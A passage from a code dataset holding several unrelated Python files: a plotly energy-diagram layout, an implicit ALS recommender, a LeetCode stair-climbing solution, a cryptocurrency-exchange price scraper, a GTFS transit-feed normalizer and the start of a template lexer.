18\r\n #__|\r\n\r\n #| - Plot Layout\r\n xax_labels = [\"O2\", \"OOH\", \"O\", \"OH\", \"H2O\"]\r\n layout = {\r\n\r\n \"title\": \"FED of ORR Mechanism For Iron-Supported-Graphene\",\r\n\r\n \"font\": {\r\n \"family\": \"Courier New, monospace\",\r\n \"size\": plot_title_size,\r\n \"color\": \"black\",\r\n },\r\n\r\n #| - Axes --------------------------------------------------------------\r\n \"yaxis\": {\r\n \"title\": \"Free Energy [eV]\",\r\n \"zeroline\": True,\r\n \"titlefont\": dict(size=axes_lab_size),\r\n \"showgrid\": False,\r\n \"tickfont\": dict(\r\n size=tick_lab_size,\r\n ),\r\n },\r\n\r\n \"xaxis\": {\r\n \"title\": \"Reaction Coordinate\",\r\n \"zeroline\": True,\r\n \"titlefont\": dict(size=axes_lab_size),\r\n \"showgrid\": False,\r\n\r\n # \"showticklabels\": False,\r\n\r\n \"ticktext\": xax_labels,\r\n \"tickvals\": [1.5 * i + 0.5 for i in range(len(xax_labels))],\r\n\r\n \"tickfont\": dict(\r\n size=tick_lab_size,\r\n ),\r\n },\r\n #__| -------------------------------------------------------------------\r\n\r\n #| - Legend ------------------------------------------------------------\r\n \"legend\": {\r\n \"traceorder\": \"normal\",\r\n \"font\": dict(size=legend_size)\r\n },\r\n #__| -------------------------------------------------------------------\r\n\r\n #| - Plot Size\r\n \"width\": 200 * 4.,\r\n \"height\": 200 * 3.,\r\n #__|\r\n\r\n }\r\n #__|\r\n\r\n fig = Figure(data=dat_lst, layout=layout)\r\n # plotly.plotly.image.save_as(fig, filename=\"pl_hab_opda_raman.png\")\r\n\r\n plotly.offline.plot(\r\n {\r\n \"data\": dat_lst,\r\n \"layout\": layout,\r\n },\r\n filename=\"plots/pl_fed_supp_graph_02.html\"\r\n )\r\n\r\n # tmp = plotly.plotly.image.plot(data, filename=\"pl_fed_180314.png\")\r\n\r\n return(layout)\r\n\r\n #__|\r\n\r\n#__|\r\n","sub_path":"plotting/my_plotly.py","file_name":"my_plotly.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"571942188","text":"\"\"\" Implicit Alternating Least Squares \"\"\"\nimport itertools\nimport logging\nimport time\n\nimport numpy as np\n\nfrom . import _als\nfrom .recommender_base import RecommenderBase\nfrom .utils import check_open_blas, nonzeros\n\nlog = logging.getLogger(\"implicit\")\n\n\nclass AlternatingLeastSquares(RecommenderBase):\n \"\"\" A Recommendation Model based off the algorithms described in the paper 'Collaborative\n Filtering for Implicit Feedback Datasets' with perfomance optimizations described in\n 'Applications of the Conjugate Gradient Method for Implicit Feedback Collaborative\n Filtering.'\n \"\"\"\n def __init__(self, factors=100, regularization=0.01, dtype=np.float64,\n use_native=True, use_cg=True,\n iterations=15, calculate_training_loss=False, num_threads=0):\n # parameters on how to factorize\n self.factors = factors\n self.regularization = regularization\n\n # options on how to fit the model\n self.dtype = dtype\n self.use_native = use_native\n self.use_cg = use_cg\n self.iterations = iterations\n self.calculate_training_loss = calculate_training_loss\n self.num_threads = num_threads\n\n # learned parameters\n self.item_factors = None\n self.user_factors = None\n\n # cache of item norms (useful for calculating similar items)\n self._item_norms = None\n\n check_open_blas()\n\n def fit(self, item_users):\n \"\"\" Factorizes the matrix Cui. This must be called before trying to recommend items.\n After calling this method, the members 'user_factors' and 'item_factors' will be\n initialized with a latent factor model of the input data\n\n Args:\n item_users (csr_matrix): Matrix of confidences for the liked items. This matrix\n should be a csr_matrix where the rows of the matrix are the\n item, the columns are the users that liked that item, and the\n value is the confidence that the user liked the item.\n \"\"\"\n Ciu, Cui = item_users.tocsr(), item_users.T.tocsr()\n items, users = Ciu.shape\n\n # Initialize the variables randomly if they haven't already been set\n if self.user_factors is None:\n self.user_factors = np.random.rand(users, self.factors).astype(self.dtype) * 0.01\n if self.item_factors is None:\n self.item_factors = np.random.rand(items, self.factors).astype(self.dtype) * 0.01\n\n # invalidate cached norms\n self._item_norms = None\n\n solver = self.solver\n\n # alternate between learning the user_factors from the item_factors and vice-versa\n for iteration in range(self.iterations):\n s = time.time()\n solver(Cui, self.user_factors, self.item_factors, self.regularization,\n num_threads=self.num_threads)\n solver(Ciu, self.item_factors, self.user_factors, self.regularization,\n num_threads=self.num_threads)\n log.debug(\"finished iteration %i in %s\", iteration, time.time() - s)\n\n if self.calculate_training_loss:\n loss = _als.calculate_loss(Cui, self.user_factors, self.item_factors,\n self.regularization, num_threads=self.num_threads)\n log.debug(\"loss at iteration %i is %s\", iteration, loss)\n\n def recommend(self, userid, user_items, N=10, filter_items=None):\n \"\"\" Returns the top N ranked items for a single user \"\"\"\n scores = self.item_factors.dot(self.user_factors[userid])\n\n # calcualte the top N items, removing the users own liked items from the results\n liked = set(user_items[userid].indices)\n if filter_items:\n liked.update(filter_items)\n\n count = N + len(liked)\n if count < len(scores):\n ids = np.argpartition(scores, -count)[-count:]\n best = sorted(zip(ids, scores[ids]), key=lambda x: -x[1])\n else:\n best = sorted(enumerate(scores), key=lambda x: -x[1])\n return list(itertools.islice((rec for rec in best if rec[0] not in liked), N))\n\n def similar_items(self, itemid, N=10):\n \"\"\" Return the top N similar items for itemid. \"\"\"\n scores = self.item_factors.dot(self.item_factors[itemid]) / self.item_norms\n best = np.argpartition(scores, -N)[-N:]\n return sorted(zip(best, scores[best] / self.item_norms[itemid]), key=lambda x: -x[1])\n\n @property\n def item_norms(self):\n if self._item_norms is None:\n self._item_norms = np.linalg.norm(self.item_factors, axis=-1)\n return self._item_norms\n\n @property\n def solver(self):\n if self.use_cg:\n return _als.least_squares_cg if self.use_native else least_squares_cg\n return _als.least_squares if self.use_native else least_squares\n\n\ndef alternating_least_squares(Ciu, factors, **kwargs):\n \"\"\" factorizes the matrix Cui using an implicit alternating least squares\n algorithm. Note: this method is deprecated, consider moving to the\n AlternatingLeastSquares class instead\n\n \"\"\"\n log.warning(\"This method is deprecated. Please use the AlternatingLeastSquares\"\n \" class instead\")\n\n model = AlternatingLeastSquares(factors=factors, **kwargs)\n model.fit(Ciu)\n return model.item_factors, model.user_factors\n\n\ndef least_squares(Cui, X, Y, regularization, num_threads=0):\n \"\"\" For each user in Cui, calculate factors Xu for them\n using least squares on Y.\n\n Note: this is at least 10 times slower than the cython version included\n here.\n \"\"\"\n users, factors = X.shape\n YtY = Y.T.dot(Y)\n\n for u in range(users):\n # accumulate YtCuY + regularization*I in A\n A = YtY + regularization * np.eye(factors)\n\n # accumulate YtCuPu in b\n b = np.zeros(factors)\n\n for i, confidence in nonzeros(Cui, u):\n factor = Y[i]\n A += (confidence - 1) * np.outer(factor, factor)\n b += confidence * factor\n\n # Xu = (YtCuY + regularization * I)^-1 (YtCuPu)\n X[u] = np.linalg.solve(A, b)\n\n\ndef least_squares_cg(Cui, X, Y, regularization, num_threads=0, cg_steps=3):\n users, factors = X.shape\n YtY = Y.T.dot(Y) + regularization * np.eye(factors, dtype=Y.dtype)\n\n for u in range(users):\n # start from previous iteration\n x = X[u]\n\n # calculate residual error r = (YtCuPu - (YtCuY.dot(Xu)\n r = -YtY.dot(x)\n for i, confidence in nonzeros(Cui, u):\n r += (confidence - (confidence - 1) * Y[i].dot(x)) * Y[i]\n\n p = r.copy()\n rsold = r.dot(r)\n\n for it in range(cg_steps):\n # calculate Ap = YtCuYp - without actually calculating YtCuY\n Ap = YtY.dot(p)\n for i, confidence in nonzeros(Cui, u):\n Ap += (confidence - 1) * Y[i].dot(p) * Y[i]\n\n # standard CG update\n alpha = rsold / p.dot(Ap)\n x += alpha * p\n r -= alpha * Ap\n rsnew = r.dot(r)\n if rsnew < 1e-10:\n break\n p = r + (rsnew / rsold) * p\n rsold = rsnew\n\n X[u] = x\n","sub_path":"implicit/als.py","file_name":"als.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"641262121","text":"# 假设你正在爬楼梯。需要 n 阶你才能到达楼顶。 \n# \n# 每次你可以爬 1 或 2 个台阶。你有多少种不同的方法可以爬到楼顶呢? \n# \n# 注意:给定 n 是一个正整数。 \n# \n# 示例 1: \n# \n# 输入: 2\n# 输出: 2\n# 解释: 有两种方法可以爬到楼顶。\n# 1. 1 阶 + 1 阶\n# 2. 2 阶 \n# \n# 示例 2: \n# \n# 输入: 3\n# 输出: 3\n# 解释: 有三种方法可以爬到楼顶。\n# 1. 1 阶 + 1 阶 + 1 阶\n# 2. 1 阶 + 2 阶\n# 3. 2 阶 + 1 阶\n# \n# Related Topics 动态规划 \n# 👍 1229 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# 方法1: 递归\nclass Solution:\n def climbStairs(self, n: int) -> int:\n if n <= 0:\n return 0\n # 避免重复递归,建立hash表\n hash_map = {1:1, 2:2, 3:3}\n # f1 = 1, f2 = 2, f3 = f1 + f2 = 3\n def backtrack(n):\n if n <= 3:\n return hash_map[n]\n\n if n not in hash_map:\n hash_map[n] = backtrack(n - 1) + backtrack(n - 2)\n return hash_map[n]\n\n backtrack(n)\n return hash_map[n]\n\n# 方法2: 迭代\nclass Solution:\n def climbStairs(self, n: int) -> int:\n if n <= 0:\n return 0\n if n <= 3:\n return n\n\n f1, f2, f3 = 1, 2, 3\n for i in range(4, n + 1):\n f1, f2 = f2, f3\n f3 = f1 + f2\n return f3\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_03/[70]爬楼梯.py","file_name":"[70]爬楼梯.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"535696049","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# from gevent import monkey\n# from gevent.queue import Queue\n# sqlstrs = Queue(maxsize=5000)\nimport numpy as np\nimport gevent\nimport sys\nimport traceback\n# monkey.patch_all()\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib3\nurllib3.disable_warnings()\nimport time\nfrom config import *\nimport threading\nimport json\nimport jubi_html_spider\nupdate_complement = [0]\nall_data = dict()\nfees = dict()\ncn_find = dict()\nhttp_pool = urllib3.PoolManager(70)\nfee_url = 'https://www.jubi.com/about/fee.html' # 费率\nallcoin_ticker = \"https://www.jubi.com/coin/allcoin\" #\"所有币种\"\nsingle_orders = \"https://www.jubi.com/api/v1/orders/\" #\"成交记录\"\nsingle_depths = \"https://www.jubi.com/coin/{0}/depth.js\" #\"深度\"\nsingle_kline = \"https://www.jubi.com/coin/{0}/k.js\"\nheaders = {\n \"Host\":\"www.jubi.com\",\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\",\n}\n\n\nclass CoinBase(threading.Thread):\n def __init__(self, name):\n threading.Thread.__init__(self, name=name)\n self.name = name\n self.order_pause_time = ORDERS_PAUSE_TIME\n self.last_tid = 0\n\n # 个体性\n self.fee = 0.001 # 手续费\n self.lsb = 0.01 # 币价最小单位\n\n\n # 每日\n self.day_open = 0 # 开盘\n self.day_open_set = 0\n self.average_volume = 0 # 平均交易额/s\n\n # 当前\n self.tickers = np.ndarray((2, TICKER_VECTOR_LENGTH)); self.tickers_index = 0\n self.tickers_stagnation = np.ndarray((2, TICKER_STAGNATION_LENGTH)); self.tickers_stagnation_index = 0\n self.orders = np.ndarray((5, ORDERS_VERTOR_LENGTH)); self.orders_index = 0\n self.depths = np.ndarray((2, DEPTHS_VECTOR_LENGTH)); self.depths_index = 0\n self.buy_one = 0\n self.sell_one = 0\n\n # 指标\n self.now_price = 0 # 当前价格\n self.current_increase = 0 # 当前日增长率\n self.now_volume = MIN_VALUE # 当前交易额\n self.volume_ratio = 0 # 与过去1天的平均每秒的交易额比例\n self.volume_percent = 0 # 交易额占比\n self.buy_indicator = 0 # 买入指数\n self.gradient = 0\n\n # 初始化\n\n self.init_lsb()\n # print('minest trade price interval is :' + str(self.lsb))\n self.start()\n\n # 不停的爬取orders\n def run(self):\n self.init_day_open()\n while True:\n acc_time = 0\n while acc_time < self.order_pause_time:\n acc_time += ORDERS_PAUSE_TIME_ITEM\n time.sleep(ORDERS_PAUSE_TIME_ITEM)\n try:\n rsp = http_pool.request('POST', single_orders, fields={'coin':self.name}, headers = headers)\n for trys in range(5):\n if rsp.status == 200:\n break\n rsp = http_pool.request('POST', single_orders, fields={'coin':self.name})\n else:\n print(self.name + 'spider orders error')\n continue\n rsp = json.loads(rsp.data.decode('utf-8'))\n for item in rsp:\n tid = int(item['tid'])\n if tid > self.last_tid:\n self.last_tid = tid\n date = int(item['date'])\n price = item['price']\n amount = item['amount']\n type = 1 if item['type'] == 'buy' else -1\n self.add_orders([tid, date, price, amount, type])\n # 统计当前交易量,当前交易量的显著水平\n current_time = time.time()\n bias = 1\n tmp_volume = 0\n while self.orders[1, self.orders_index - bias] + ORDERS_VOLUME_COUNT_TIME > current_time:\n tmp_volume += self.orders[2, self.orders_index - bias] * self.orders[3, self.orders_index - bias]\n bias += 1\n self.now_volume = tmp_volume /ORDERS_VOLUME_COUNT_TIME + MIN_VALUE\n self.volume_ratio = self.now_volume / self.average_volume\n # 计算下一次更新orders的时间\n expect_time = self.orders[1, self.orders_index - 1] - self.orders[1, self.orders_index - 1 - ORDERS_INTERVAL]\n self.order_pause_time = expect_time if expect_time < ORDERS_PAUSE_TIME_MAX else ORDERS_PAUSE_TIME_MAX\n # print(self.name + 'expect_time' + str(expect_time))\n zero_time = (time.time() + TZ8) % (3600 * 24)\n # 接近凌晨时将order更新时间加快\n if zero_time < 30 or (3600 * 24 - zero_time) < 30:\n self.order_pause_time = ORDERS_PAUSE_TIME_MIN\n except Exception as e:\n print(traceback.print_exc())\n pass\n\n\n\n\n def init_lsb(self):\n try:\n rsp = http_pool.request('POST', single_orders, fields={'coin': self.name})\n trys = 0\n if rsp.status != 200 and trys < 5:\n rsp = http_pool.request('POST', single_orders, fields={'coin': self.name})\n trys += 1\n rsp = json.loads(rsp.data.decode('utf-8'))\n rsp = np.array([item['price'] for item in rsp])\n tts = 0\n rsp = np.abs(rsp - np.round(rsp))\n while np.max(rsp) > 1e-6:\n tts += 1\n rsp *= 10\n rsp = np.abs(rsp - np.round(rsp))\n self.lsb = self.lsb / 10**tts\n\n except Exception as e:\n print(e)\n print(\"init the LSB error\" + self.name)\n self.lsb = 0.01\n\n def add_ticker(self, tick):\n self.now_price = tick[1]\n self.current_increase = self.now_price / self.day_open - 1\n if self.tickers_index % 10 == 0:\n pass\n # print(self.name + '_add ticker success_' + str(self.tickers_index))\n if self.tickers_index == TICKER_VECTOR_LENGTH:\n self.tickers[:, 0 : TICKER_VECTOR_LENGTH - TICKER_SUPPLEMENT_LENGTH] = self.tickers[:, TICKER_SUPPLEMENT_LENGTH : ]\n self.tickers_index = TICKER_VECTOR_LENGTH - TICKER_SUPPLEMENT_LENGTH\n self.tickers[:, self.tickers_index] = tick\n self.tickers_index += 1\n else:\n self.tickers[:, self.tickers_index] = tick\n self.tickers_index += 1\n if self.tickers_index >= 2 and self.tickers[1][self.tickers_index - 1] != self.tickers[1][self.tickers_index - 2]:\n self.order_pause_time = ORDERS_PAUSE_TIME_MIN\n\n\n\n # 增加一条交易记录\n def add_orders(self, order):\n if self.orders_index == ORDERS_VERTOR_LENGTH:\n self.orders[:, 0 : ORDERS_VERTOR_LENGTH - ORDERS_SUPPLEMENT_LENGTH] = self.orders[:, ORDERS_SUPPLEMENT_LENGTH :]\n self.orders_index = ORDERS_VERTOR_LENGTH - ORDERS_SUPPLEMENT_LENGTH\n self.orders[:, self.orders_index] = order\n self.orders_index += 1\n else:\n self.orders[:, self.orders_index] = order\n self.orders_index += 1\n if self.orders_index % 100 == 0:\n pass\n # print(self.name + 'add order success: ' + str(self.orders_index))\n # 运行程序时会初始化一下当天的开盘时间\n def init_day_open(self):\n try:\n kline_rsp = requests.get(single_kline.format(self.name))\n for trys in range(5):\n if kline_rsp.status_code == 200:\n break\n else:\n kline_rsp = requests.get(single_kline.format(self.name))\n else:\n print('init_day_open_http_error')\n kline_rsp = kline_rsp.text\n index = kline_rsp.find('{\"5m\"')\n kline_rsp = kline_rsp[index: -3]\n dic = json.loads(kline_rsp)\n self.day_open = float(dic['1d'][-1][2]) + MIN_VALUE\n except Exception as e:\n print(e)\n print('day open init failed in ' + self.name)\n self.day_open = MIN_VALUE\n\n\n\n\n\n\n\n\n\n\n\n\ndef spider_tickers():\n t_before = time.time()\n while True:\n t_behind = time.time()\n if t_behind - t_before < 1:\n time.sleep(t_behind - t_before)\n t_before = t_behind\n try:\n time.sleep(TICKER_PAUSE_TIME)\n rsp = requests.get(allcoin_ticker, headers = headers).json()\n # rsp = http_pool.request('GET', allcoin_ticker).data.decode('utf-8')\n # rsp = json.loads(rsp)\n # print(rsp)\n ticker_time = time.time()\n for (name, value) in rsp.items():\n if name in all_data.keys():\n update_complement[0] = [1] # 更新完成标志\n all_data[name].add_ticker([ticker_time, value[1]])\n all_data[name].buy_one = value[2]\n all_data[name].sell_one = value[3]\n day_begin = (ticker_time + TZ8) % (24 * 3600)\n all_data[name].average_volume = value[7] / 24 / 3600 + MIN_VALUE\n if day_begin < 10:\n if day_begin < 5:\n if not all_data[name].day_open_set:\n all_data[name].day_open = value[1]\n all_data[name].day_open_set = 1\n else:\n all_data[name].day_open_set = 0\n\n else: # 不存在则生成,生成的时候将手续费率也整进去\n all_data[name] = CoinBase(name)\n all_data[name].average_volume = value[7] / 24 / 3600 + MIN_VALUE\n all_data[name].day_open = value[1]\n all_data[name].add_ticker([ticker_time, value[1]])\n if value[0] in fees.keys():\n all_data[name].fee = fees[value[0]]\n else:\n rsp = requests.get(fee_url)\n trys = 0\n if rsp.status_code != 200 and trys < 5:\n rsp = requests.get(fee_url)\n trys += 1\n rsp = rsp.text\n soup = BeautifulSoup(rsp, 'lxml')\n dls = soup.find_all('dl', attrs={'class':'clear'})\n for dl in dls:\n dlc = dl.find_all('dd', attrs = {'class':'borderNone'}, limit = 2)\n fee = dlc[1].text\n try:\n fee = float(fee[0:-1])\n except:\n continue\n fees[dlc[0].text] = fee\n if value[0] == dlc[0].text:\n all_data[name].fee = fee / 100\n print('add table:' + name)\n except Exception as e:\n print(traceback.print_exc())\n\ndef main():\n # spider_tickers()\n t = threading.Thread(target=spider_tickers)\n t.start()\n t2 = jubi_html_spider.trade_main()\n\n\n\n # gevent.joinall(event)\n\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"jubiMain.py","file_name":"jubiMain.py","file_ext":"py","file_size_in_byte":11357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"275426532","text":"\"\"\"Normalize a Gtfs.\"\"\"\nimport warnings\nfrom slugify import slugify\n\nimport pandas as pd\n\nfrom gtfstools.utils import showme, pandas_tools\nfrom gtfstools.config import normalize_settings as settings\nfrom gtfstools.gtfs.fill_columns.shapes import EstimateShapes\nfrom gtfstools.gtfs.fill_columns.stoptimes import EstimateStopTimes\n\n\nclass GtfsNormalizer(object):\n \"\"\"Normalize the dataframes from the zip file.\"\"\"\n\n def __init__(self, gtfs_dict, gtfs_path):\n \"\"\"Constructor.\n\n Args:\n -----\n gtfs_dict (dict): dict of dataframes from the zipfile.\n gtfs_path (str): path of the gtfszip.\n \"\"\"\n self.gtfs_dict = gtfs_dict\n self.dict_files = settings.DICT\n self.gtfs_path = gtfs_path\n\n @staticmethod\n def normalize_str(txt):\n \"\"\"Normalize a str.\n\n Args:\n -----\n txt (str): string to normalize.\n\n Returns:\n --------\n string normalized.\n \"\"\"\n try:\n return slugify(txt, separator=\" \")\n except TypeError as _:\n return txt\n\n def normalize_serie(self, serie):\n \"\"\"Normalize a dataframes column.\n\n Args:\n -----\n serie (pd.Serie): serie to normalize.\n\n Returns:\n --------\n serie normalized.\n \"\"\"\n return serie.map(self.normalize_str)\n\n def normalize_dataframe(self, frame, cols):\n \"\"\"Normalize all columns of a dataframe.\n\n Args:\n -----\n frame (pd.DataFrame): dataframe to normalize.\n cols (list): all columns required and optionals.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n for col in cols:\n if col in frame.columns:\n frame[col] = self.normalize_serie(frame[col])\n else:\n frame[col] = None\n\n return frame\n\n def agency(self):\n \"\"\"Normalize the agency.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"agency.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"agency.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def calendar(self):\n \"\"\"Normalize the Calendar.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"calendar.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"calendar.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def calendar_dates(self):\n \"\"\"Normalize the calendar_dates.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n if bool(\"calendar_dates.txt\" in self.gtfs_dict.keys()):\n return self.normalize_calendar_dates()\n else:\n return self.generate_calendar_dates()\n\n def normalize_calendar_dates(self):\n \"\"\"Normalize the calendar_dates.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"calendar_dates.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"calendar_dates.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n @staticmethod\n def generate_calendar_dates():\n \"\"\"Create an empty dataframe of calendar_dates.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n print(\"We don't have calendar_dates.txt in GTFS zip.\")\n frame = pd.DataFrame()\n frame.columns = [\"date\", \"service_id\", \"exception_type\"]\n\n return frame\n\n def routes(self):\n \"\"\"Normalize the routes.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n warnings.filterwarnings(\"ignore\")\n frame = self.gtfs_dict[\"routes.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n frame[\"sha\"] = (\n frame[\"route_long_name\"].map(str) +\n frame[\"route_short_name\"].map(str)\n )\n frame = frame.sort_values(by=\"sha\")\n\n def route_direction(serie):\n \"\"\"Change the name of the 2 routes in the same direction.\n\n Args:\n -----\n serie (pd.Serie): serie to update.\n\n Returns:\n --------\n serie updated.\n \"\"\"\n lst_index = list(serie.loc[serie.shift(-1) == serie].index)\n for idx in lst_index:\n serie.loc[idx] += \"_other_direction\"\n\n route_direction(frame[\"sha\"])\n cols = self.dict_files[\"routes.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def stops(self):\n \"\"\"Normalize the stops.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"stops.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"stops.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def stoptimes(self):\n \"\"\"Normalize the stoptimes.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"stop_times.txt\"].copy()\n\n def prepare_stop_times(frame):\n \"\"\"Fill the stoptimes missing.\n\n Args:\n -----\n frame (pd.DataFrame): dataframe to fill.\n\n Returns:\n --------\n dataframe filled.\n \"\"\"\n try:\n frame[\"arrival_time\"] = frame[\"arrival_time\"].map(time2seconds)\n frame[\"departure_time\"] = frame[\"departure_time\"].map(time2seconds)\n except TypeError as _:\n print(\"Some stoptimes are generating...\")\n frame = EstimateStopTimes.main(frame)\n\n return frame\n\n def time2seconds(tps):\n \"\"\"Transform time into seconds.\n\n Args:\n -----\n tps (str): time %h:%m:%s.\n\n Returns:\n --------\n seconds from time.\n \"\"\"\n try:\n hour, minute, second = map(int, str(tps).split(\":\"))\n sod = hour * 3600 + minute * 60 + second\n return sod\n except TypeError as _:\n return tps\n\n frame = prepare_stop_times(frame)\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"stop_times.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def trips(self):\n \"\"\"Normalize the trips.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n frame = self.gtfs_dict[\"trips.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"trips.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def shapes(self, trips):\n \"\"\"Normalize the shapes.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n\n def have_all_shapes(trips):\n \"\"\"Does the shapes are all in the zipfile.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n bool if there are all shapes in the zip.\n \"\"\"\n trips_without_shapes = trips[trips[\"shape_id\"].isnull()]\n\n return bool(len(trips_without_shapes) == 0)\n\n if bool(\"shapes.txt\" in self.gtfs_dict.keys()):\n if have_all_shapes(trips):\n shapes = self.normalize_shapes()\n else:\n shapes, trips = self.fill_missing_shapes(trips)\n else:\n shapes, trips = self.generate_all_shapes(trips)\n\n return shapes, trips\n\n def normalize_shapes(self, frame=None):\n \"\"\"Normalize the shapes.\n\n Args:\n -----\n frame (pd.DataFrame): dataframe of shapes\n\n Returns:\n --------\n dataframe normalized.\n \"\"\"\n if frame is None:\n frame = self.gtfs_dict[\"shapes.txt\"].copy()\n frame = pandas_tools.change_nan_value(frame, None)\n cols = self.dict_files[\"shapes.txt\"].requiered\n\n return self.normalize_dataframe(frame, cols)\n\n def fill_missing_shapes(self, trips):\n \"\"\"Fill the missing shapes.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n dataframe filled.\n \"\"\"\n\n def find_missing_shapes(trips):\n \"\"\"Determine the shapes missing.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n shapes available, shapes missing.\n \"\"\"\n available_shapes = trips[~trips[\"shape_id\"].isnull()]\n missing_shapes = trips[trips[\"shape_id\"].isnull()]\n msg = \"{} shapes on {} are generating...\"\n print(msg.format(len(missing_shapes), len(available_shapes)))\n\n return available_shapes, missing_shapes\n\n def complete_shapes(shapes, _shape):\n \"\"\"Concat the shapes real, and generated.\n\n Args:\n -----\n shapes (pd.DataFrame): shapes real.\n _shape (pd.DataFrame): shapes generated.\n\n Returns:\n --------\n dataframe which contains all the shapes.\n \"\"\"\n shapes = pd.concat([shapes, _shape])\n shapes = self.normalize_shapes(frame=shapes)\n\n return shapes\n\n available_shapes, missing_shapes = find_missing_shapes(trips)\n shapes = self.gtfs_dict[\"shapes.txt\"].copy()\n _shape, _trip = EstimateShapes(self.gtfs_path).main(missing_shapes)\n trips = pd.concat([available_shapes, _trip])\n shapes = complete_shapes(shapes, _shape)\n\n return shapes, trips\n\n def generate_all_shapes(self, trips):\n \"\"\"Generate missing shapes.\n\n Args:\n -----\n trips (pd.DataFrame): trips dataframe.\n\n Returns:\n --------\n shapes generated, trips with new shapes.\n \"\"\"\n shapes, trips = EstimateShapes(self.gtfs_path).main(trips)\n shapes = self.normalize_shapes(frame=shapes)\n\n return shapes, trips\n\n @showme.time\n def normalize(self):\n \"\"\"Normalize the gtfs.\n\n Returns:\n --------\n dict of dataframes.\n \"\"\"\n gtfs_dict = dict()\n gtfs_dict[\"agency.txt\"] = self.agency()\n gtfs_dict[\"calendar.txt\"] = self.calendar()\n gtfs_dict[\"calendar_dates.txt\"] = self.calendar_dates()\n gtfs_dict[\"routes.txt\"] = self.routes()\n gtfs_dict[\"stops.txt\"] = self.stops()\n gtfs_dict[\"stop_times.txt\"] = self.stoptimes()\n trips = self.trips()\n shapes, trips = self.shapes(trips)\n gtfs_dict[\"shapes.txt\"] = shapes\n gtfs_dict[\"trips.txt\"] = trips\n\n return gtfs_dict\n","sub_path":"gtfstools/gtfs/normalizer.py","file_name":"normalizer.py","file_ext":"py","file_size_in_byte":11220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"378314241","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# A Lexer for our templates!\n\nimport re\nfrom collections import deque\n\nimport syntax\nfrom tokens import *\nfrom exc import TemplateSyntaxError\n\nc = lambda x: re.compile(x)\n_RE_MEGA = r'({0}.*?{1})|({2}.*?{3})|({4}.*?{5})'.format(*syntax.SYMBOLS)\n\n\nclass Token(object):\n \"\"\"\n Wrapper of each word Token seen in the source text.\n Along with the value of the token, some extra information is also\n stored as attributes.\n \"\"\"\n\n def __init__(self, value, line_no=None, col_no=None):\n # Lets get this thing working first.\n # Take care of line number, col number later!\n self.value = value\n self.line_no = line_no\n self.col_no = col_no\n self.type = self.get_token_type()\n\n def get_token_type(self):\n \"\"\"\n Analyse the token content and return the token type.\n \"\"\"\n token_begin = self.value[:2]\n token_end = self.value[-2:]\n token_set = (token_begin, token_end)\n if token_set[0] in syntax.SYMBOLS and token_set[1] in syntax.SYMBOLS:\n token_content = self.value[2:-2].strip()\n if token_content[:3] == 'end':\n token_type = TOKEN_BLOCK_END\n else:\n token_type = TOKEN_DICT.get(token_begin)\n self.check_token_syntax(token_type, token_content)\n else:\n token_type = TOKEN_HTML\n return token_type\n\n def clean(self):\n if self.type in [TOKEN_VAR, TOKEN_BLOCK]:\n return ''.join(self.value[2:-2].strip())\n return self.value\n\n def check_token_syntax(self, token_type, token_content):\n \"\"\"\n Some basic syntax analysis here, based on token types.\n \"\"\"\n if token_type == TOKEN_BLOCK_END and len(token_content.split()) > 1:\n raise TemplateSyntaxError('Invalid end token!')\n elif token_type == TOKEN_BLOCK:\n split = token_content.split()\n 